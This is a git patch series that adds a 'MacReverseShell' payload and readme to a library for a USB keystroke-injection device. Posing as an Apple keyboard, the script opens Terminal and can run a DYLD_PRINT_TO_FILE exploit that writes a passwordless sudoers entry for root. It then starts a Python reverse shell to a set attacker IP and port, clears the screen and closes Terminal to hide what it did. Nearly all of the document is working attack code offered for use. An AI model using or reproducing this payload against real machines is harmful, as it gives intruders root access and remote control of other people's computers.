From 00684c885724a5cb1a3eb0d5419c3483d1926738 Mon Sep 17 00:00:00 2001 From: Chris Date: Mon, 13 Mar 2017 21:45:07 -0400 Subject: [PATCH 1/2] MRS initial add of reverse shell for mac --- payloads/library/MacReverseShell/payload.txt | 53 ++++++++++++++++++++ payloads/library/MacReverseShell/readme.md | 21 ++++++++ 2 files changed, 74 insertions(+) create mode 100755 payloads/library/MacReverseShell/payload.txt create mode 100755 payloads/library/MacReverseShell/readme.md diff --git a/payloads/library/MacReverseShell/payload.txt b/payloads/library/MacReverseShell/payload.txt new file mode 100755 index 0000000..9b4bf03 --- /dev/null +++ b/payloads/library/MacReverseShell/payload.txt @@ -0,0 +1,53 @@ +LED B +#Set your Variables, bro +DYLD_ROOT=true +LHOST=192.168.17.12 +LPORT=4444 + +#daddy want a MacBook keyboard, or momma mac be mad, go boom boom. +VID 05ac +PID 2227 +LANGUAGE='us' + + +# Gimme a Keyboard please. Thanks. +ATTACKMODE HID +LED R G B + +# Get a terminal +QUACK DELAY 400 +QUACK GUI SPACE +QUACK DELAY 300 +QUACK STRING terminal +QUACK DELAY 200 +QUACK ENTER +QUACK DELAY 400 + +# optional DYLD exploit script +if $DYLD_ROOT; then + LED R + QUACK SPACE + QUACK STRING echo \'echo \"\$\(whoami\) ALL=\(ALL\) NOPASSWD\:ALL\" \>\&3\' \| DYLD_PRINT_TO_FILE=\/etc\/sudoers newgrp\; sudo -s + QUACK ENTER + QUACK DELAY 200 + QUACK ENTER + QUACK ENTER + QUACK ENTER + QUACK ENTER + QUACK DELAY 200 +fi + +# python reverse shell +QUACK SPACE +QUACK STRING \(python -c \'import sys,socket,os,pty\; \_,ip,port=sys.argv\; s=socket.socket\(\)\; s.connect\(\(ip,int\(port\)\)\)\; [os.dup2\(s.fileno\(\),fd\) for fd in \(0,1,2\)]\; pty.spawn\(\"\/bin\/bash\"\)\' $LHOST $LPORT \&\) +QUACK ENTER +QUACK DELAY 200 +QUACK SPACE +QUACK STRING clear +QUACK ENTER +QUACK GUI q +QUACK DELAY 100 +QUACK ENTER + +# Green is the official Light of "finished" +LED G \ No newline at end of file diff --git a/payloads/library/MacReverseShell/readme.md b/payloads/library/MacReverseShell/readme.md new file mode 100755 index 0000000..085589c --- /dev/null +++ b/payloads/library/MacReverseShell/readme.md @@ -0,0 +1,21 @@ +# Mac Reverse Shell + +Author: mrt0mat0 +Version: Version 1.0 + +## Description + +Using ducky script, it opens a python reverse shell to the IP and PORT of your choosing. Also, as a nice little bonus, it runs the DYLD exploit that, if vulnerable will give you a root shell. + +## Configuration + +This is configured for Macbooks as a keyboard. I am not 100% about how the VID and PID variables work, so that may just be BS at the top :) - That's what github is for. Exploit does not work on updated macs + +## STATUS + +| LED | Status | +| ---------------- | ------------------------------------- | +| Blue | Setup | +| White | Running the scripts | +| Red | r00t exploit is running (optional | +| Green | Finished | \ No newline at end of file From 70af321846c083318169d25997b817cd8292b24a Mon Sep 17 00:00:00 2001 From: Chris Date: Mon, 13 Mar 2017 21:50:31 -0400 Subject: [PATCH 2/2] MRS initial add of reverse shell for mac --- payloads/library/MacReverseShell/payload.txt | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/payloads/library/MacReverseShell/payload.txt b/payloads/library/MacReverseShell/payload.txt index 9b4bf03..1085348 100755 --- a/payloads/library/MacReverseShell/payload.txt +++ b/payloads/library/MacReverseShell/payload.txt @@ -4,14 +4,10 @@ DYLD_ROOT=true LHOST=192.168.17.12 LPORT=4444 -#daddy want a MacBook keyboard, or momma mac be mad, go boom boom. -VID 05ac -PID 2227 LANGUAGE='us' - # Gimme a Keyboard please. Thanks. -ATTACKMODE HID +ATTACKMODE HID VID_0X05AC PID_0X021E LED R G B # Get a terminal